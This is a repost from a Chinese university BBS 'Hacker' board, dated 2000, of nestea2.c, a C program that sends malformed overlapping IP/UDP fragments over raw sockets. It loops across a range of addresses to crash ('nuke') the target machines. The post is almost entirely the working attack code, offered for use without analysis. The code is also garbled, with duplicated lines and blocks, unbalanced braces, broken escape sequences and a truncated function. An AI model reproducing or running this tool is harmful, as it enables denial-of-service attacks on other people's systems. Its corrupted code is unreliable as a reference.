荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: bstone (Sealed!), 信区: Hacker
标 题: nestea2.c
发信站: BBS 荔园晨风站 (Mon Apr 10 21:47:41 2000), 站内信件
发信人: cloudsky (小四), 信区: Security
标 题: nestea2.c
发信站: 武汉白云黄鹤站 (Mon Apr 10 11:48:38 2000), 站内信件
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */
#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
#define MAGIC2 108
#define PADDING 256 /* datagram frame padding for first packet */
#define COUNT 500 /* we are overwriting a small number of bytes we
shouldnt have access to in the kernel.
to be safe, we should hit them till they die :> */
struct ipstuph
{
int p1;
int p2;
int p3;
int p4;
} startip, endip;
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);
int main(int argc, char **argv)
int main(int argc, char **argv)
{
int one = 1, count = 0, i, rip_sock, j, bequiet = 0;
u_long src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
char hit_ip[18], dst_ip2[18];
struct in_addr addr;
fprintf(stderr, "\n;34mNestea v2 0;34moriginally by0m: ;34mhumble 0;34m+ ;3m
ttol mods0m\n");
fprintf(stderr, "0;34mColor and Instructions was done by 0m: ;34mttol0m\n");
fprintf(stderr, ";34mNote0m : ;34mttol released Nestea v2. humble had nothn
g to do with \n it, don't nag him about it. -ttol@ttol.net0m\n\n");
if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror(";34mraw socket0m");
exit(1);
}
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
< 0)
{
perror("IP_HDRINCL");
perror("IP_HDRINCL");
exit(1);
}
if (argc < 4) usage(argv[0]);
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
{
fprintf(stderr, ";34mWhat the hell kind of IP address is that?0m\n");
exit(1);
}
strcpy(dst_ip2,argv[3]);
if(sscanf(argv[2],"%d.%d.%d.%d",&startip.p1,&startip.p2,&startip.p3,
&startip.p4) != 4)
{
fprintf(stderr, ";34mError, arg2(startip) 0m: 0;34mNeed an ip that contais
4 zones0m\n");
exit(1);
}
if (startip.p1 > 255) {
fprintf(stderr, ";34mError 0m: 0;34mZone 1 of start ip is incorrect \
(greater than 255)0m\n");
exit(1);
}
}
if (startip.p2 > 255) {
fprintf(stderr, ";34mError 0m: 0;34mZone 2 of start ip is incorrect \
(greater than 255)0m\n");
exit(1);
}
if (startip.p3 > 255) {
fprintf(stderr, ";34mError 0m: 0;34mZone 3 of start ip is incorrect \
(greater than 255)0m\n");
exit(1);
}
if (startip.p4 > 255) {
fprintf(stderr, ";34mError 0m: 0;34mZone 4 of start ip is incorret \
(greater than 255)0m\n");
exit(1);
}
if(sscanf(argv[3],"%d.%d.%d.%d",&endip.p1,&endip.p2,&endip.p3,
&endip.p4) != 4)
{
fprintf(stderr, ";34mError, arg3(endip) 0m: [[0;34mNeed an ip that \
contains 4 zones[[0m\n");
exit(1);
}
}
if (endip.p1 > 255) {
fprintf(stderr, ";34mError 0m: 0;34mZone 1 of end ip is incorrect \
(greater than 255)0m\n");
exit(1);
}
if (endip.p2 > 255) {
fprintf(stderr, ";34mError 0m: 0;34mZone 2 of end ip is incorrect \
(greater than 255)0m\n");
exit(1);
}
if (endip.p3 > 255) {
fprintf(stderr, ";34mError 0m: 0;34mZone 3 of end ip is incorrect
(greater than 255)0m\n");
exit(1);
}
if (endip.p4 > 255) {
fprintf(stderr, ";34mError 0m: 0;34mZone 4 of end ip is incorrect
(greater than 255)0m\n");
exit(1);
}
if (startip.p1 != endip.p1) {
fprintf(stderr, ";34mError 0m: 0;34mZone 1 of start ip and end ip is diffr
fprintf(stderr, ";34mError 0m: 0;34mZone 1 of start ip and end ip is diffr
ent0m\n");
exit(1);
}
if (startip.p2 != endip.p2) {
fprintf(stderr, ";34mError 0m: 0;34mZone 2 of start ip and end ip is diffr
ent0m\n");
exit(1);
}
if (startip.p3 != endip.p3) {
fprintf(stderr, ";34mError 0m: 0;34mZone 3 of start ip and end ip is diffr
ent0m\n");
exit(1);
}
while ((i = getopt_long(argc, argv, "s:t:n:q")) != EOF)
{
switch (i)
{
case 's': /* source port (should be emphemeral) */
src_prt = (u_short)atoi(optarg);
break;
case 't': /* dest port (DNS, anyone?) */
case 't': /* dest port (DNS, anyone?) */
dst_prt = (u_short)atoi(optarg);
break;
case 'n': /* number to send */
count = atoi(optarg);
break;
case 'q': /* quiet mode */
bequiet = 1;
break;
default :
usage(argv[0]);
break; /* NOTREACHED */
}
}
srandom((unsigned)(time((time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count) count = COUNT;
fprintf(stderr, ";34mDeath 0;34mon flaxen wings (;34myet again0;34m)0m:\n");
addr.s_addr = src_ip;
fprintf(stderr, ";34mFrom0m: 0;34m%15s.%d0m\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
addr.s_addr = dst_ip;
fprintf(stderr, " ;34mTo0m: 0;34m%15s - %s.%d0m\n", inet_ntoa(addr),
dst_ip2, dst_prt);
fprintf(stderr, " ;34mAmt0m: 0;34m%5d0m\n", count);
if (bequiet) fprintf(stderr, "0;34m[;34mquiet mode0;34m] 0;34mEach';34m.0;3m
' represents a nuked ip. 0;34m[0m");
for (j=startip.p4; j <= endip.p4; j++)
{
sprintf(hit_ip,"%d.%d.%d.%d",startip.p1,startip.p2,startip.p3,j);
if (!(bequiet)) fprintf(stderr, "0;34m%s ;34m[ 0m", hit_ip);
if (!(dst_ip = name_resolve(hit_ip)))
{
fprintf(stderr, "0;34mWhat the ;34mhell 0;34mkind of IP address is tht
?0m\n");
exit(1);
}
for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
addr.s_addr = dst_ip;
fprintf(stderr, " ;34mTo0m: 0;34m%15s - %s.%d0m\n", inet_ntoa(addr),
dst_ip2, dst_prt);
fprintf(stderr, " ;34mAmt0m: 0;34m%5d0m\n", count);
if (bequiet) fprintf(stderr, "0;34m[;34mquiet mode0;34m] 0;34mEach';34m.0;3m
' represents a nuked ip. 0;34m[0m");
for (j=startip.p4; j <= endip.p4; j++)
{
sprintf(hit_ip,"%d.%d.%d.%d",startip.p1,startip.p2,startip.p3,j);
if (!(bequiet)) fprintf(stderr, "0;34m%s ;34m[ 0m", hit_ip);
if (!(dst_ip = name_resolve(hit_ip)))
{
fprintf(stderr, "0;34mWhat the ;34mhell 0;34mkind of IP address is tht
?0m\n");
exit(1);
}
for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
if (!(bequiet)) fprintf(stderr, "0;34md;34m000;34mm 0m");
usleep(500);
}
if (bequiet) fprintf(stderr, ";34m.0m");
else fprintf(stderr, "0;34m]0m\n");
}
if (bequiet) fprintf(stderr, "0;34m]0m\n");
return (0);
}
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
u_short dst_prt)
{
int i;
u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
u_char byte; /* a byte */
struct sockaddr_in sin; /* socket protocol structure */
sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;
packet = (u_char *)malloc(IPH + UDPH + PADDING+40);
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + 10); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + 10); /* UDP total length */
if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + 10); /* UDP total length */
if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2;
*((u_short *)p_ptr) = FIX(6); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
--
我问飘逝的风:来迟了?
风感慨:是的,他们已经宣战。
我问苏醒的大地:还有希望么?
大地揉了揉眼睛:还有,还有无数代的少年。
我问长空中的英魂:你们相信?
英魂带着笑意离去:相信,希望还在。
※ 来源:.武汉白云黄鹤站 bbs.whnet.edu.cn.[FROM: 203.207.226.124]
--
☆ 来源:.BBS 荔园晨风站 bbs.szu.edu.cn.[FROM: bbs@192.168.28.106]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店